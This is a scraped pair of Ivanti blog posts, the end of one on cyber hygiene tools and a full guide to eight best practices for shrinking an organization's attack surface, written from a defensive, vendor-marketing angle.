· Recognizing social engineering attack techniques including the several types of phishing attacks.

· Using multi-factor authentication whenever possible. 

· Installing and automatically updating the databases on antivirus software for desktops and mobile threat defense for mobile devices. 

Continuing education is key to promoting great cyber hygiene within your organization, especially for anti-phishing campaigns.  

Cyber hygiene tool recomendations 

In cybersecurity, the saying goes, “You can’t protect what you can’t see!” Having a complete discovery and accurate inventory of all network-connected hardware, software and data, including shadow IT assets, is the important first step to assessing an organization’s vulnerability risk profile. The asset data should feed into an enterprise endpoint patch management system

Also, consider implementing a risk-based vulnerability management approach to prioritize the overwhelming number of vulnerabilities to only those that pose the greatest risk to your organization. Often included with risk-based vulnerability management solutions is a threat intelligence feed into the patch management system

Threat intelligence is information about known or potential threats to an organization. These threats can come from a variety of sources, like security researchers, government agencies, infrastructure vulnerability and application security scanners, internal and external penetration testing results and even threat actors themselves. 

This information, including specific patch failures and reliability reported from various crowdsourced feeds, can help organizations remove internal patch testing requirements and reduce the time gap to patch deployments to critical assets.

unified endpoint management (UEM) platform is necessary to remotely manage and provide endpoint security to mobile devices including shadow IT and BYOD assets.

The solution can enforce patching to the latest mobile operating system (OS) and applications, provision email and secure remote access profiles including identity credentials and multi-factor authentication (MFA) methods like biometrics, smart cards, security keys, certificate-based or token-based authentication.

The UEM solution should also integrate an AI machine learning-based mobile threat defense (MTD) solution for mobile devices, while desktops require next-generation antivirus (NGAV) with robust heuristics to detect and remediate device, network, and app threats with real-time anti-phishing protection.

And finally, to level the playing field against AI-generated malware, cyber hygiene tools will have to evolve quickly by leveraging AI guidance to keep up with the more sophisticated polymorphic attacks that are on the horizon.

Adding the solutions described above will help deter cyberattacks by putting impediments in front of threat actors to frustrate them and seek out easier targets to victimize. 

About James Saturnio

James Saturnio is the Technical Product Marketing Director for the Technical Marketing Engineering team at Ivanti. He immerses himself in all facets of cybersecurity with over 25 years’ hands-on industry experience. He is an always curious practitioner of the zero trust security framework. Prior to Ivanti, he was with MobileIron for almost 7 years as a Senior Solutions Architect and prior to that, he was at Cisco Systems for 19 years. While at Cisco, he started out as a Technical Assistance Center (TAC) Engineer and then a Technical Leader for the Security Technology and Internet of Things (IoT) business units. He is a former Service Provider and Security Cisco Certified Internetworking Expert (CCIE) and was the main architect for the IoT security architecture that is still used today by Cisco’s lighthouse IoT customers.

Source :
https://www.ivanti.com/blog/three-reasons-endpoint-security-can-t-stop-with-just-patching-or-antivirus

The 8 Best Practices for Reducing Your Organization’s Attack Surface

Last updated: June 20, 2023
Robert Waters
Security Unified Endpoint Management DEX

Increases in attack surface size lead to increased cybersecurity risk. Thus, logically, decreases in attack surface size lead to decreased cybersecurity risk.

While some attack surface management solutions offer remediation capabilities that aid in this effort, remediation is reactive. As with all things related to security and risk management, being proactive is preferred.

The good news is that ASM solutions aren’t the only weapons security teams have in the attack surface fight. There are many steps an organization can take to lessen the exposure of its IT environment and preempt cyberattacks.

How do I reduce my organization’s attack surface?

Unfortunately for everyone but malicious actors, there’s no eliminating your entire attack surface, but the following best practice security controls detailed in this post will help you significantly shrink it:

  1. Reduce complexity 
  2. Adopt a zero trust strategy for logical and physical access control
  3. Evolve to risk-based vulnerability management
  4. Implement network segmentation and microsegmentation
  5. Strengthen software and asset configurations
  6. Enforce policy compliance
  7. Train all employees on cybersecurity policies and best practices
  8. Improve digital employee experience (DEX)

As noted in our attack surface glossary entry, different attack vectors can technically fall under multiple types of attack surfaces — digital, physical and/or human. Similarly, many of the best practices in this post can help you reduce multiple types of attack surfaces.

For that reason, we have included a checklist along with each best practice that signifies which type(s) of attack surface a particular best practice primarily addresses.

#1: Reduce complexity

.

Digital attack surface Physical attack surface Human attack surface 
XX

.

Reduce your cybersecurity attack surface by reducing complexity. Seems obvious, right? And it is. However, many companies have long failed at this seemingly simple step. Not because it’s not obvious, but because it hasn’t always been easy to do.

Research from Randori and ESG reveals seven in 10 organizations were compromised by an unknown, unmanaged or poorly managed internet-facing asset over the past year. Cyber asset attack surface management (CAASM) solutions enable such organizations to identify all their assets — including those that are unauthorized and unmanaged — so they can be secured, managed or even removed from the enterprise network.

Any unused or unnecessary assets, from endpoint devices to network infrastructure, should also be removed from the network and properly discarded.

The code that makes up your software applications is another area where complexity contributes to the size of your attack surface. Work with your development team to identify where opportunities exist to minimize the amount of executed code exposed to malicious actors, which will thereby also reduce your attack surface.

#2: Adopt a zero trust strategy for logical and physical access control

.

Digital attack surface Physical attack surface Human attack surface 
XX

.

The National Institute of Standards and Technology (NIST) defines zero trust as follows:

“A collection of concepts and ideas designed to minimize uncertainty in enforcing accurate, least privilege per-request access decisions in information systems and services in the face of a network viewed as compromised.”

In other words, for every access request, “never trust, always verify.”

Learn how Ivanti can help you adopt the NIST CSF in The NIST Cybersecurity Framework (CSF): Mapping Ivanti’s Solutions to CSF Controls

Taking a zero trust approach to logical access control reduces your organization’s attack surface — and likelihood of data breaches — by continuously verifying posture and compliance and providing least-privileged access.

And while zero trust isn’t a product but a strategy, there are products that can help you implement a zero trust strategy. Chief among those products are those included in the secure access service edge (SASE) framework:

And though it’s not typically viewed in this manner, a zero trust strategy can extend beyond logical access control to physical access control. When it comes to allowing anyone into secure areas of your facilities, remember to never trust, always verify. Mechanisms like access cards and biometrics can be used for this purpose.

#3: Evolve to risk-based vulnerability management

.

Digital attack surface Physical attack surface Human attack surface 
X

.

First, the bad news: the US National Vulnerability Database (US NVD) contains over 160,000 scored vulnerabilities and dozens more are added every day. Now, the good news: a vast majority of vulnerabilities have never been exploited, which means they can’t be used to perpetrate a cyberattack, which means they aren’t part of your attack surface.

In fact, a ransomware research report from Securin, Cyber Security Works (CSW), Ivanti and Cyware showed only 180 of those 160,000+ vulnerabilities were trending active exploits.

Comparison of total NVD vulnerabilities vs. those that endanger an organization

Total NVD graph.
Only approximately 0.1% of all vulnerabilities in the US NVD are trending active exploits that pose an immediate risk to an organization

legacy approach to vulnerability management reliant on stale and static risk scores from the Common Vulnerability Scoring System (CVSS) won’t accurately classify exploited vulnerabilities. And while the Cybersecurity & Infrastructure Security Agency Known Exploited Vulnerabilities (CISA KEV) Catalog is a step in the right direction, it’s incomplete and doesn’t account for the criticality of assets in an organization’s environment.

A true risk-based approach is needed. Risk-based vulnerability management (RBVM) — as its name suggests — is a cybersecurity strategy that prioritizes vulnerabilities for remediation based on the risk they pose to the organization.

Read The Ultimate Guide to Risk-Based Patch Management and discover how to evolve your remediation strategy to a risk-based approach.

RBVM tools ingest data from vulnerability scannerspenetration teststhreat intelligence tools and other security sources and use it to measure risk and prioritize remediation activities.

With the intelligence from their RBVM tool in hand, organizations can then go about reducing their attack surface by remediating the vulnerabilities that pose them the most risk. Most commonly, that involves patching exploited vulnerabilities on the infrastructure side and fixing vulnerable code in the application stack.

#4: Implement network segmentation and microsegmentation

.

Digital attack surface Physical attack surface Human attack surface 
X

.

Once again, borrowing from the NIST glossary, network segmentation is defined as follows:

Splitting a network into sub-networks, for example, by creating separate areas on the network which are protected by firewalls configured to reject unnecessary traffic. Network segmentation minimizes the harm of malware and other threats by isolating it to a limited part of the network.

From this definition, you can see how segmenting can reduce your attack surface by blocking attackers from certain parts of your network. While traditional network segmentation stops those attackers from moving north-south at the network level, microsegmentation stops them from moving east-west at the workload level.

More specifically, microsegmentation goes beyond network segmentation and enforces policies on a more granular basis — for example, by application or device instead of by network.

For example, it can be used to implement restrictions so an IoT device can only communicate with its application server and no other IoT devices, or to prevent someone in one department from accessing any other department’s systems.

#5: Strengthen software and asset configurations

.

Digital attack surface Physical attack surface Human attack surface 
X

.

Operating systems, applications and enterprise assets — such as servers and end user, network and IoT devices — typically come unconfigured or with default configurations that favor ease of deployment and use over security. According to CIS Critical Security Controls (CIS Controls) v8, the following can all be exploitable if left in their default state:

  • Basic controls
  • Open services and ports
  • Default accounts or passwords
  • Pre-configured Domain Name System (DNS) settings
  • Older (vulnerable) protocols
  • Pre-installation of unnecessary software

Clearly, such configurations increase the size of an attack surface. To remedy the situation, Control 4: Secure Configuration of Enterprise Assets and Software of CIS Controls v8 recommends developing and applying strong initial configurations, then continually managing and maintaining those configurations to avoid degrading security of software and assets.

Here are some free resources and tools your team can leverage to help with this effort:

#6: Enforce policy compliance

.

Digital attack surface Physical attack surface Human attack surface 
XX

.

It’s no secret that endpoints are a major contributor to the size of most attack surfaces — especially in the age of Everywhere Work when more employees are working in hybrid and remote roles than ever before. Seven in 10 government employees now work virtually at least part of the time.

It’s hard enough getting employees to follow IT and security policies when they’re inside the office, let alone when 70% of them are spread all over the globe.

Unified endpoint management (UEM) tools ensure universal policy compliance by automatically enforcing policies. This fact should come as no surprise to IT and security professionals, many of whom consider UEM a commodity at this point. In fact, Gartner predicts that 90% of its clients will manage most of their estate with cloud-based UEM tools by just 2025.

Nonetheless, UEM is the best option for enforcing IT and security policy compliance, so I’d be remiss to omit it from this list.

Read The Ultimate Guide to Unified Endpoint Management and learn about the key business benefits and endpoint security use cases for modern UEM solutions.

Additionally, beyond compliance, modern UEM tools offer several other capabilities that can help you identify, manage and reduce your attack surface:

  • Have complete visibility into IT assets by discovering all devices on your network — a key ASM capability for organizations without a CAASM solution.
  • Provision devices with the appropriate software and access permissions, then automatically update that software as needed — no user interactions required.
  • Manage all types of devices across the entire lifecycle, from onboarding to retirement, to ensure they’reproperly discarded once no longer in use.
  • Automatically enforce device configurations (refer to #5: Strengthen software and asset configurations to learn more about the importance of this capability).
  • Support zero trust access and contextual authentication, vulnerability, policy, configuration and data management by integrating with identity, security and remote-access tools. For example, UEM and mobile threat defense (MTD) tools can integrate to enable you to enact risk-based policies to protect mobile devices from compromising the corporate network and its assets.

#7: Train all employees on cybersecurity policies and best practices

.

Digital attack surface Physical attack surface Human attack surface 
X

.

Seventy-four percent of breaches analyzed for the 2023 Verizon Data Breaches Investigation Report (DBIR) involved a human element.

Thus, it should come as no surprise when you review the data from Ivanti’s 2023 Government Cybersecurity Status Report and see the percentages of employees around the world that don’t believe their actions have any impact on their organization’s ability to avert cyberattacks:

Do employees think their own actions matter?

Many employees don’t believe their actions impact their organization’s ability to stay safe from cyberattacks.

In the immortal words of Alexander Pope: “To err is human…” In cybersecurity terms: until AI officially takes over, humans will remain a significant part of your attack surface. And until then, human attack surfaces must be managed and reduced wherever possible.

Thus far, the best way to do that’s proven to be cybersecurity training, both on general best practices and company-specific policies — and definitely don’t forget to include a social engineering module.

Many cybersecurity practitioners agree. When the question “In your experience, what security measure has been the most successful in preventing cyberattacks and data breaches?” was posed in Reddit’s r/cybersecurity subreddit, many of the top comments referenced the need for user education:

Reddit / u/Forbesington
Reddit / u/slybythenighttothecape
Reddit / u/_DudeWhat
Reddit / u/onneseen

To once again borrow from CIS Controls v8, Control 14: Security Awareness and Skills Training encourages organizations to do the following: “Establish and maintain a security awareness program to influence behavior among the workforce to be security conscious and properly skilled to reduce cybersecurity risks to the enterprise.”

CIS — the Center for Internet Security — also recommends leveraging the following resources to help build a security awareness program:

Security and IT staff — not just those in non-technical roles — should also be receiving cybersecurity training relevant to their roles. In fact, according to the IT and security decision-makers surveyed by Randori and ESG for their 2022 report on The State of Attack Surface Management, providing security and IT staff with more ASM training would be the third most-effective way to improve ASM.

Ensuring partners, vendors and other third-party contractors take security training as well can also help contain your human attack surface.

#8: Improve digital employee experience (DEX)

.

Digital attack surface Physical attack surface Human attack surface 
XX

.

No matter how much cybersecurity training you provide employees, the more complex and convoluted security measures become, the more likely they are to bypass them. Sixty-nine percent of end users report struggling to navigate overly convoluted and complex security measures. Such dissatisfied users are prone to distribute data over unsecured channels, prevent the installation of security updates and deploy shadow IT.

That seems to leave IT leaders with an impossible choice: improve digital employee experience (DEX) at the cost of security or prioritize security over experience? The truth is, security and DEX are equally important to an organization’s success and resilience. In fact, according to research from Enterprise Management Associates (EMA), reducing security friction leads to far fewer breach events.

So what do you do? Ivanti’s 2022 Digital Employee Experience Report indicates IT leaders — with support from the C-suite — need to put their efforts toward providing a secure-by-design digital employee experience. While that once may have seemed like an impossible task, it’s now easier than ever thanks to an emerging market for DEX tools that help you measure and continuously improve employees’ technology experience.

Read the 2022 Digital Employee Experience Report to learn more about the role DEX plays in cybersecurity.

One area in which organizations can easily improve both security and employee experience is authentication. Annoying and inefficient to remember, enter and reset, passwords have long been the bane of end users.

On top of that, they’re extremely unsecure. Roughly half of the 4,291 data breaches not involving internal malicious activity analyzed for the 2023 Verizon DBIR were enabled through credentials — about four times the amount enabled by phishing — making them by far the most popular path into an organization’s IT estate.

Passwordless authentication software solves this problem. If you’d like to improve end user experience and reduce your attack surface in one fell swoop, deploy a passwordless authentication solution that uses FIDO2 authentication protocols. Both you and your users will rejoice when you can say goodbye to passwords written on Post-it Notes forever.

For more guidance on how to balance security with DEX, refer to the following resources:

Additional guidance from free resources

Ivanti’s suggested best practices for reducing your attack surface combine learnings from our firsthand experience plus secondhand knowledge gleaned from authoritative resources.

And while these best practices will indeed greatly diminish the size of your attack surface, there’s no shortage of other steps an organization could take to combat the ever-expanding size and complexity of modern attack surfaces.

Check out the following free resources — some of which were referenced above — for additional guidance on shrinking your attack surface:

Next steps

So, you’ve implemented all the best practices above and you’re wondering what’s next. As with all things cybersecurity, there’s no time for standing still. Attack surfaces require constant monitoring.

You never know when the next unmanaged BYOD device will connect to your network, the next vulnerability in your CRM software will be exploited or the next employee will forget their iPhone at the bar after a team happy hour.

On top of tracking existing attack vectors, you also need to stay informed about emerging ones. For example, the recent explosion of AI models is driving substantial attack surface growth, and it’s safe to say more technologies that open the door to your IT environment are on the horizon. Stay vigilant.

About Robert Waters

Robert Waters is the Lead Product Marketing Manager for endpoint security at Ivanti. His 15 years of marketing experience in the technology industry include an early stint at a Fortune 1000 telecommunications company and a decade at a network monitoring and managed services firm.

Robert joined Ivanti in November of 2022 and now oversees all things risk-based vulnerability management and patch management.

Source :
https://www.ivanti.com/blog/the-8-best-practices-for-reducing-your-organization-s-attack-surface